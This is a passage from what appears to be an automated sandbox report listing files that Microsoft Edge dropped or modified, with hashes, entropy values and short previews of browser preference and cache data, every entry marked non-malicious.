                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090767229766663
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):50
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9904355005135823
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                                                                                                                    MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                                                                                                                    SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                                                                                                                    SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                                                                                                                    SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:topTraffic_170540185939602997400506234197983529371
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                    MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                    SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                    SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                    SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:uriCache_
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.020265484668824
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXQoS/y:YWLSGTt1o9LuLgfGBPAzkVj/T8lAo+y
                                                                                                                                                                                                                                                                                    MD5:DE0E6D3F7B1005BE7DD68E0D74164B75
                                                                                                                                                                                                                                                                                    SHA1:3901B91D901B915716B5F587A38D0DCECBE54D68
                                                                                                                                                                                                                                                                                    SHA-256:6BB0F0AF285DF8B96B4701144A0D43D26391FA2B05A1C8D0E0A1D2A30BCD74C2
                                                                                                                                                                                                                                                                                    SHA-512:B4CAF550A06BEC4F7974CEFA6046E2855095953DF6B9FFAFC14CA4F04B171DD61592E1296CD6DDDDCDBCBCD4E0F2111BC3988D5C047EE5AA9933D712E77EE4EE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732324387173889}]}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):85
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQ1:YQ3Kq9X0dMgAEiLIX
                                                                                                                                                                                                                                                                                    MD5:916D4F5F8E2C8885224D1575807F6676
                                                                                                                                                                                                                                                                                    SHA1:BDF182D48EB1C332D8438A30E19146EC1B5B1012
                                                                                                                                                                                                                                                                                    SHA-256:35B72ABBB267230A52EB2FE73A32485FBF6DAB0E4DCB5A9F56A5B67FF476973E
                                                                                                                                                                                                                                                                                    SHA-512:89FDE148CE52B52C8BDD8F321CFAD0CDCFF6F265D3D5C722B577BC8D70E7E6BAF4809C5A5D394FDA20FFC8D3DDAF5AB3BD84E11DC0C9933DABE037180EDE661D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":5}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):47186
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.094521770706816
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jretv7b3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6Dxr2chu3VlXr4CRoR
                                                                                                                                                                                                                                                                                    MD5:4C35B91F261359BF38EAB1C11D61634D
                                                                                                                                                                                                                                                                                    SHA1:756DAF4D8F2C1EE2C26854FAA60E566DF21CAFD3
                                                                                                                                                                                                                                                                                    SHA-256:DD985754D7B0160F92CD885BDEF6E839F61371A0D61CE92D082AA996ECFA8F21
                                                                                                                                                                                                                                                                                    SHA-512:FA354B35A75080E3EF5F171588C6216697A2D765CB47CCF1E16459588442DB6DEC82FFDD3861E8184CC3176596B1554BBE347E70C5896BE9915656C65BB7A753
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):46321
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.093327811081409
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jre4lb3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6Dxrrchu3VlXr4CRoI
                                                                                                                                                                                                                                                                                    MD5:2D3174ECB00F257998FC1A848FBCB3FC
                                                                                                                                                                                                                                                                                    SHA1:D50BBAEBC6FF7E1D831F7BA47C3E2E115D49A3DA
                                                                                                                                                                                                                                                                                    SHA-256:DBA26D82FD5B2079DABB74A64B314D4D83A1548F6C24530138BEA2E2633A57F4
                                                                                                                                                                                                                                                                                    SHA-512:A1A699D5B0C56A79EB728D09EA0737E0A3B5D4C876CB4AE4DBE3985A72F5D75B098C65A5E54CD17FEB09A96FAB4623F93F49AF6CEC6FB82FD1627590240D1F36
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45567
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.092822593891334
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jygbh/pehcGoup1Xl3jVzXrT:b/Ps+wsI7yO9wf6DxAchu3VlXr4CRo4
                                                                                                                                                                                                                                                                                    MD5:1408AA20D4B94A851B860FBF5E30489B
                                                                                                                                                                                                                                                                                    SHA1:AE21B116772C6B0A82522B0DB2122C2F4BCFE2A0
                                                                                                                                                                                                                                                                                    SHA-256:5530DC953A4346A246B3BC407337E55ABEFDDD4084EFAC36FCCE10514FBB67D9
                                                                                                                                                                                                                                                                                    SHA-512:ABE0F62B933A4023127E6A7108001BEE65B4DA870BA53817ED356C3C9FE5E6D2F120554D3F9AF5D834D01BFA4E53CF6566C77C3DF0A24D998D17136DE97F3564
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):47186
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.094521770706816
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jretv7b3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6Dxr2chu3VlXr4CRoR
                                                                                                                                                                                                                                                                                    MD5:4C35B91F261359BF38EAB1C11D61634D
                                                                                                                                                                                                                                                                                    SHA1:756DAF4D8F2C1EE2C26854FAA60E566DF21CAFD3
                                                                                                                                                                                                                                                                                    SHA-256:DD985754D7B0160F92CD885BDEF6E839F61371A0D61CE92D082AA996ECFA8F21
                                                                                                                                                                                                                                                                                    SHA-512:FA354B35A75080E3EF5F171588C6216697A2D765CB47CCF1E16459588442DB6DEC82FFDD3861E8184CC3176596B1554BBE347E70C5896BE9915656C65BB7A753
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2278
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8392761395967065
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxrgxIxl9Il8u2KyI0WdQKESlSVxYEHGDdbleZP8bd1rc:mVYIWCYC4dbleZP9
                                                                                                                                                                                                                                                                                    MD5:857EFFC279EC252C2E8CE013B32B4109
                                                                                                                                                                                                                                                                                    SHA1:4D81E599005E4D55848D673FAD26767C56282370
                                                                                                                                                                                                                                                                                    SHA-256:3E9909AFD1A6F288F0D35E3C3A248ED8B5D792478D666C4DE9D39768B50816C3
